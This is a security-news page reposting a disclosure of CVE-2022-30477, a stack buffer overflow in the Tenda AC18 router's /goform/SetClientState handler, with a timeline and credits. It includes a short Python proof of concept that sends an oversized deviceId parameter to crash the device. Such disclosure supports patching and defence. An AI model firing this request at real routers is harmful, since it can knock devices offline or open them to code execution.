Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30477: VulnRepo/IoT/Tenda/4 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetClientState request.

CVE
Open in Source
#vulnerability#rce#buffer_overflow

Tenda Router AC18 Vulnerability

This vulnerability lies in the /goform/SetClientState page which influences the lastest version of Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318))

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function formSetClientState.

In function formSetClientState it reads user provided parameter deviceId into v9, and this variable is passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/SetClientState, the attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

PoC

import requests

IP = “10.10.10.1” url = f"http://{IP}/goform/SetClientState?" url += “limitEn=1&deviceId=” + “s” * 0x500

response = requests.get(url)

Timeline

  • 2022-05-07: Report to CVE & CNVD;
  • 2022-05-26: CVE ID assigned (CVE-2022-30477)

Acknowledge

Credit to @peanuts and @cylin from IIE, CAS.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE